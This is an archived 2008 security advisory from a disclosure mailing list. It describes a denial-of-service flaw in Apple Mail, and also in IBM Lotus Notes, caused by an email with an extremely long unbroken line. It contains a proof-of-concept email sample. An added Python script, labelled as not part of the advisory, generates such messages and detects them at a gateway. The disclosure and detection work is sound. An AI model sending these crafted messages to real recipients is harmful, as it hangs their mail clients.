[Full-disclosure] Apple Mail Denial of Service Vulnerability (with bonus IBM Lotus Notes DoS!)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Apple Mail Denial of Service Vulnerability (with bonus IBM Lotus Notes DoS!)
- From: David Wharton <security@xxxxxxxxxxxxxxx>
- Date: Thu, 29 May 2008 19:31:39 -0500
***Summary***
A maliciously crafted e-mail message can cause a denial of service in
multiple versions of the Apple Mail email client.
***Scope***
Apple Mail version 3.1 (914/915)
Apple Mail version 3.2 (919/919.2)
Note: other versions of this product may be vulnerable as well; I have
not tested them. The vendor has been made aware of this issue and has
chosen not to treat it as a security issue.
Interestingly enough, a similar issue seems to be present in multiple
versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z --
http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611)
. The exploit provided in this advisory will also cause a denial of
service condition on multiple versions of IBM Lotus Notes. IBM has
been kind enough to create SPR# PRAD7DPKLW to address the issue the
exploit targets.
***Description***
An email message with a maliciously crafted body (in my tests I used a
long line) can cause the e-mail client to hang, resulting in a denial
of service condition. Testing with emails that do not have any
newline characters (0x0A, 0x0D) or spaces (0x20) shows that a line
consisting of 1.5 MB can cause the email clients to hang for over half
an hour.
Initial testing reveals the following:
In Apple Mail, the e-mail is rendered correctly in the preview pane
but a subsequent click on a different e-mail causes the application to
hang.
***Credits***
David Wharton
***References***
Apple Mail
http://www.apple.com/macosx/features/mail.html
***PoC Exploit***
Below is a sample e-mail with headers (some headers removed or
modified) that causes the e-mail clients to hang as discussed. Note
that the body is one long line; the "=" at the end of each line is not
part of it, it is the quoted-printable soft line break inserted for
formatting. In reality most of the body is one long contiguous string
of A's.
Subject: dos test
MIME-Version: 1.0
From: xxxxx@xxxxxxxxx
To: xxxxx@xxxxxxxxx
Date: xxxxx
Message-ID: <xxxxx.xxxxx-xxxxx.xxxxx-xxxxx.xxxxx@xxxxxxxxx>
X-Mailer: xxxxx
MIME-Version: 1.0
Content-Type: text/html;
charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0
X-CTASD-IP: xxx.xxx.xxx.xxx
X-CTASD-Sender: xxxxx@xxxxxxxxx
x-ctasd: uncategorized
x-ctasd-vod: uncategorized
x-ctasd-station:
X-OriginalArrivalTime: xxxxx@
<font size=3D"2">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
<snip> (removed a few thousand 'A's)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</font>N=
OTICE: This e-mail message and all attachments transmitted with it may con=
tain confidential information intended solely for the use of the addressee.=
<br />=
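The following Python script is an added example, not code from the advisory or from Apple or IBM. It builds a message of the same shape as the PoC above (text/html, quoted-printable, one contiguous run of A's inside a font tag) with the standard library, and pairs it with the check a mail gateway would need: undo the transfer encoding and measure the longest whitespace-free run in the decoded body. The point it makes that the sample alone does not is that the wire form looks harmless, since every physical line is cut short by "=" soft breaks, so a filter that looks at raw line lengths will not catch it. The addresses, the run lengths and the 64 KiB threshold are assumptions chosen for the example.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Assumed gateway threshold (a constructed figure, not from the advisory):
# a decoded run longer than this with no whitespace is treated as hostile.
MAX_UNBROKEN_RUN = 64 * 1024


def build_long_line_message(run_length: int) -> bytes:
    """Build a message of the same shape as the advisory's PoC: text/html,
    quoted-printable, body = one contiguous run of 'A's inside a <font> tag.
    Returns the raw RFC 5322 bytes as they would travel over SMTP."""
    msg = EmailMessage()
    msg["Subject"] = "dos test"
    msg["From"] = "sender@example.invalid"   # placeholder addresses
    msg["To"] = "victim@example.invalid"
    body = '<font size="2">' + "A" * run_length + "</font>"
    # cte="quoted-printable" makes the stdlib wrap the wire form with
    # "=" soft line breaks, as in the advisory's sample.
    msg.set_content(body, subtype="html", charset="iso-8859-1",
                    cte="quoted-printable")
    return msg.as_bytes()


def max_wire_line_length(raw: bytes) -> int:
    """Longest physical line in the raw message, i.e. what a naive
    line-length filter on the undecoded bytes would see."""
    return max(len(line) for line in raw.splitlines())


def longest_unbroken_run(raw: bytes) -> int:
    """Parse the message, undo the transfer encoding of every text part and
    return the longest run of bytes containing no space, tab, CR or LF.
    This is the line the client has to lay out, and it is only visible
    once the soft line breaks have been removed."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    longest = 0
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True) or b""
        for run in re.split(rb"[ \t\r\n]+", payload):
            longest = max(longest, len(run))
    return longest


def is_suspicious(raw: bytes, limit: int = MAX_UNBROKEN_RUN) -> bool:
    """True when the decoded body holds a whitespace-free run longer than
    `limit`; a gateway could reject or re-wrap such a message on delivery."""
    return longest_unbroken_run(raw) > limit


if __name__ == "__main__":
    sample = build_long_line_message(200_000)
    print("longest wire line:", max_wire_line_length(sample))
    print("longest decoded run:", longest_unbroken_run(sample))
    print("suspicious:", is_suspicious(sample))
```

Measuring after decoding also covers base64 bodies, where the wire form is wrapped at 76 columns regardless of content; the same `get_payload(decode=True)` call handles both encodings. The threshold is a policy choice: the advisory reports a hang at 1.5 MB, but a client that chokes on a line of that size will usually degrade well before it, so the limit should be set from testing the clients actually in use rather than from the figure in the report.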
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/